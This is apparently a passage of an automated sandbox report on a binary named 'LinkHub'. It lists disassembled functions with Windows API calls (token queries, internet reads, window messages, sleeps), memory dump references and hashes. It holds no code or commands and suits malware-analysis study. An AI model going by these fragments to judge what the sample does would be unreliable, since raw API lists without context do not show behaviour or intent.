                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00289A8F
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00289AAF
                                                                                          • Part of subcall function 0021F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00271A02,?,753CE610), ref: 0021F9F1
                                                                                          • Part of subcall function 0021F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00260354,00000000,00000000,?,?,00271A02,?,753CE610,?,00260354), ref: 0021FA18
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                        • String ID:
                                                                                        • API String ID: 666041331-0
                                                                                        • Opcode ID: c03b1382294ba08961c93438b02150c9d4c457a309d183c53fb92e1b982622d1
                                                                                        • Instruction ID: 33a1ca83b359cc780b7806225997356528c65e17ee0a3056b9d1ff897ced267c
                                                                                        • Opcode Fuzzy Hash: c03b1382294ba08961c93438b02150c9d4c457a309d183c53fb92e1b982622d1
                                                                                        • Instruction Fuzzy Hash: 5D516F39615205DFC705EF68C4848ADBBF0FF09314B188199E80A9B7A2D731ED95CF91
                                                                                        Function 002975AE Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetWindowLongW.USER32(00000002,000000F0,?), ref: 0029766B
                                                                                        • SetWindowLongW.USER32(?,000000EC,?), ref: 00297682
                                                                                        • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 002976AB
                                                                                        • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0027B5BE,00000000,00000000), ref: 002976D0
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 002976FF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Long$MessageSendShow
                                                                                        • String ID:
                                                                                        • API String ID: 3688381893-0
                                                                                        • Opcode ID: cc5c120c1d423a01b268b19dbb2486a0e1cebedea4c077d446795ca632d521b7
                                                                                        • Instruction ID: 36f4ceca20afe161ae0ff222d4f09afbceebc59de714747501f2bf54b1175482
                                                                                        • Opcode Fuzzy Hash: cc5c120c1d423a01b268b19dbb2486a0e1cebedea4c077d446795ca632d521b7
                                                                                        • Instruction Fuzzy Hash: 0C41D135A38605AFDB25CF6CDC48FA9BBA9EB09350F150225F819A72E0D770AD21DA50
                                                                                        Function 002323C1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free
                                                                                        • String ID:
                                                                                        • API String ID: 269201875-0
                                                                                        • Opcode ID: 19a8d8b9e5576514b950a2b00a95b761dda91605a25155d05e098c66875187ce
                                                                                        • Instruction ID: 5fcc82cd290b9dbffd73c14570c1266039c610d39306d327a825d459ac37672f
                                                                                        • Opcode Fuzzy Hash: 19a8d8b9e5576514b950a2b00a95b761dda91605a25155d05e098c66875187ce
                                                                                        • Instruction Fuzzy Hash: 5841CFB2A20210EFDB20DF78C881A59B3F6EF88314F1545A9E615EB391D631ED15CB80
                                                                                        Function 0026224E Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(?,?), ref: 00262262
                                                                                        • PostMessageW.USER32(00000001,00000201,00000001), ref: 0026230E
                                                                                        • Sleep.KERNEL32(00000000,?,?,?), ref: 00262316
                                                                                        • PostMessageW.USER32(00000001,00000202,00000000), ref: 00262327
                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?), ref: 0026232F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePostSleep$RectWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3382505437-0
                                                                                        • Opcode ID: 4923ff4c47f7041dbaf99b9a03cf18f3cca2ae4f5f4d72a13939c76d33956b61
                                                                                        • Instruction ID: 36ce9916cf009a9e38352593a75f7451e05f0ef3f19cfe4e3f9af2d59b433b58
                                                                                        • Opcode Fuzzy Hash: 4923ff4c47f7041dbaf99b9a03cf18f3cca2ae4f5f4d72a13939c76d33956b61
                                                                                        • Instruction Fuzzy Hash: 0D31C272910219EFDB14CFA8DD8DADE3BB5EB04315F104225FD25AB2D0C77099A4DB90
                                                                                        Function 0027D95F Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0027CC63,00000000), ref: 0027D97D
                                                                                        • InternetReadFile.WININET(?,00000000,?,?), ref: 0027D9B4
                                                                                        • GetLastError.KERNEL32(?,00000000,?,?,?,0027CC63,00000000), ref: 0027D9F9
                                                                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,0027CC63,00000000), ref: 0027DA0D
                                                                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,0027CC63,00000000), ref: 0027DA37
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                        • String ID:
                                                                                        • API String ID: 3191363074-0
                                                                                        • Opcode ID: b9c9a7a436010f5c6a50ee9c0f4b5f6b6bd7997220b4150163cdd0e30c03a0ab
                                                                                        • Instruction ID: b078da45cb34922feadc6a00c9e3be15483380683af3e13b723bf143ced92f2f
                                                                                        • Opcode Fuzzy Hash: b9c9a7a436010f5c6a50ee9c0f4b5f6b6bd7997220b4150163cdd0e30c03a0ab
                                                                                        • Instruction Fuzzy Hash: A7315C71924206EFDB20DFA5E988AAFBBF8EF44350B10846EE54AD2151D770EE50DB60
                                                                                        Function 002961A5 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 002961E4
                                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 0029623C
                                                                                        • _wcslen.LIBCMT ref: 0029624E
                                                                                        • _wcslen.LIBCMT ref: 00296259
                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 002962B5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 763830540-0
                                                                                        • Opcode ID: 38915e03d85d7617b2dd173d563aca7ebcf593993c6c4d70eae96c349e071f53
                                                                                        • Instruction ID: c900dbb0227cfb8926a30cf11ddded12d255013ce3b18e70fe86ab688c9ed87a
                                                                                        • Opcode Fuzzy Hash: 38915e03d85d7617b2dd173d563aca7ebcf593993c6c4d70eae96c349e071f53
                                                                                        • Instruction Fuzzy Hash: B4219131D20219AADF119FA4DC88AEEB7B9EF05760F104217F929EA180D7B099A5DF50
                                                                                        Function 0028138D Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsWindow.USER32(00000000), ref: 002813AE
                                                                                        • GetForegroundWindow.USER32 ref: 002813C5
                                                                                        • GetDC.USER32(00000000), ref: 00281401
                                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 0028140D
                                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 00281445
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ForegroundPixelRelease
                                                                                        • String ID:
                                                                                        • API String ID: 4156661090-0
                                                                                        • Opcode ID: 69f48fdb88eabebcc9db0c07292b460217acf5fed3a9e4e76ca70c60740d91bf
                                                                                        • Instruction ID: 341856acb2956a5719933cbaccfeb1d95aa0e64f72b623b5d9009163eef09ee5
                                                                                        • Opcode Fuzzy Hash: 69f48fdb88eabebcc9db0c07292b460217acf5fed3a9e4e76ca70c60740d91bf
                                                                                        • Instruction Fuzzy Hash: 00219336610204AFDB04EF65D888AAEB7F9EF48340B048469F84AD7791CA30AD54DF90
                                                                                        Function 0023D13D Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 0023D146
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0023D169
                                                                                          • Part of subcall function 00233B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00220165,?,?,002711D9,0000FFFF), ref: 00233BC5
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0023D18F
                                                                                        • _free.LIBCMT ref: 0023D1A2
                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0023D1B1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                        • String ID:
                                                                                        • API String ID: 336800556-0
                                                                                        • Opcode ID: 24c9b2ecddfaa11a034f4a87f231d5dbad481a4d16ca170dfa3d102c26ad1b76
                                                                                        • Instruction ID: ec3719bece846e7e65b10dda8a800eaee75a114cb4b93d8622d3c4d03e22ac91
                                                                                        • Opcode Fuzzy Hash: 24c9b2ecddfaa11a034f4a87f231d5dbad481a4d16ca170dfa3d102c26ad1b76
                                                                                        • Instruction Fuzzy Hash: DD01A7F76216167F33216A7A7C8CD7B7A7EEEC2B61714012AFD4CC6244DA608D1195B0
                                                                                        Function 0023316B Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(74DE2E40,?,?,0022F64E,00233BD6,?,?,00220165,?,?,002711D9,0000FFFF), ref: 00233170
                                                                                        • _free.LIBCMT ref: 002331A5
                                                                                        • _free.LIBCMT ref: 002331CC
                                                                                        • SetLastError.KERNEL32(00000000), ref: 002331D9
                                                                                        • SetLastError.KERNEL32(00000000), ref: 002331E2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$_free
                                                                                        • String ID:
                                                                                        • API String ID: 3170660625-0
                                                                                        • Opcode ID: ea94c501098ad923b0dc3bd5ea4e08bf3f2b9dc585e8eeb7a31b6d5213627f66
                                                                                        • Instruction ID: 66b07a4883ef7ed8842ca823218bab0ae4957c50f6f720376e76ccbc73a33d24
                                                                                        • Opcode Fuzzy Hash: ea94c501098ad923b0dc3bd5ea4e08bf3f2b9dc585e8eeb7a31b6d5213627f66
                                                                                        • Instruction Fuzzy Hash: C70178F22706017B8312EB34BC89E2B26ADAFC1772F200026F85CD2181EFA1CF315920
                                                                                        Function 002608FE Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00260831,80070057,?,?,?,00260C4E), ref: 0026091B
                                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00260831,80070057,?,?), ref: 00260936
                                                                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00260831,80070057,?,?), ref: 00260944
                                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00260831,80070057,?), ref: 00260954
                                                                                        • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00260831,80070057,?,?), ref: 00260960
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 3897988419-0
                                                                                        • Opcode ID: bd85a5e9f3c360a91872994b0f2db2814aad47cffb991077fd6ed6c6b2fabb6c
                                                                                        • Instruction ID: b4bda0986ff618ebee3373d276e23248a9188c47b486a751a15764294a3e5f11
                                                                                        • Opcode Fuzzy Hash: bd85a5e9f3c360a91872994b0f2db2814aad47cffb991077fd6ed6c6b2fabb6c
                                                                                        • Instruction Fuzzy Hash: 9E01F772621205BFEB014F54DC88B9F7BBEEF44B51F100115F905D2112D7B0DD91AB60
                                                                                        Function 0026F292 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 0026F2AE
                                                                                        • QueryPerformanceFrequency.KERNEL32(?), ref: 0026F2BC
                                                                                        • Sleep.KERNEL32(00000000), ref: 0026F2C4
                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 0026F2CE
                                                                                        • Sleep.KERNEL32 ref: 0026F30A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                        • String ID:
                                                                                        • API String ID: 2833360925-0
                                                                                        • Opcode ID: 68370e4dd0c24f8d151688a39237f36d709291023b8d13f380f092b8bc65656e
                                                                                        • Instruction ID: 4c7236ffc56db42f437dda1ee54ac3965f8d333753c167e2f824f5e4afd3d580
                                                                                        • Opcode Fuzzy Hash: 68370e4dd0c24f8d151688a39237f36d709291023b8d13f380f092b8bc65656e
                                                                                        • Instruction Fuzzy Hash: AF016971D11619DBDF00AFA4FE4DAEEBB78FB08700F0004A6E901B2254DB7095B4DBA1
                                                                                        Function 00261A45 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00261A60
                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,?,?,002614E7,?,?,?), ref: 00261A6C
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,002614E7,?,?,?), ref: 00261A7B
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,002614E7,?,?,?), ref: 00261A82
                                                                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00261A99
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 842720411-0
                                                                                        • Opcode ID: 244667dbfe2bedae0cbb2195454da21dcae5cc4c355694a280016b4909558f95
                                                                                        • Instruction ID: 9e0ee85e0d1f468816b6603877d4c446af75bfc8e2e8e0abd69ac1c7739028ef
                                                                                        • Opcode Fuzzy Hash: 244667dbfe2bedae0cbb2195454da21dcae5cc4c355694a280016b4909558f95
                                                                                        • Instruction Fuzzy Hash: 4C01AFB9601306BFDB114FA8EC4CE6B3B7EEF883A4B250465F845C32A0DA31DC50DA60
                                                                                        Function 00261900 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00261916
                                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00261922
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00261931
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00261938
                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0026194E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 44706859-0
                                                                                        • Opcode ID: b67c6436601efe18e9b9a06ccff3e2858db74d6533b62369d889508434293131
                                                                                        • Instruction ID: ade10477cbf2a9f9d35602ec3638f63630fdaa5ae2ba21171074570e3295a77c
                                                                                        • Opcode Fuzzy Hash: b67c6436601efe18e9b9a06ccff3e2858db74d6533b62369d889508434293131
                                                                                        • Instruction Fuzzy Hash: 8CF09676111312BBDB210F65EC4DF5B3B6DEF897A1F540415FA45D7260CA70EC50DA60
                                                                                        Function 00261960 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00261976
                                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00261982
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00261991
                                                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00261998
                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002619AE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 44706859-0
                                                                                        • Opcode ID: 7dac718d06f0105d20d4cd64a338d5498f26f483111c40492eabff5d98b45fb1
                                                                                        • Instruction ID: fd61f2f6cca754f7e4284aab216801d08a3e895be868c00a887a6608197f20c7
                                                                                        • Opcode Fuzzy Hash: 7dac718d06f0105d20d4cd64a338d5498f26f483111c40492eabff5d98b45fb1
                                                                                        • Instruction Fuzzy Hash: 2FF06276101312BBDB214F64EC5DF5B3B6DEF897A1F140515F945C7260CA70E850DA60
                                                                                        Function 00270CB6 Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00270B24,?,00273D41,?,00000001,00243AF4,?), ref: 00270CCB
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00270B24,?,00273D41,?,00000001,00243AF4,?), ref: 00270CD8
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00270B24,?,00273D41,?,00000001,00243AF4,?), ref: 00270CE5
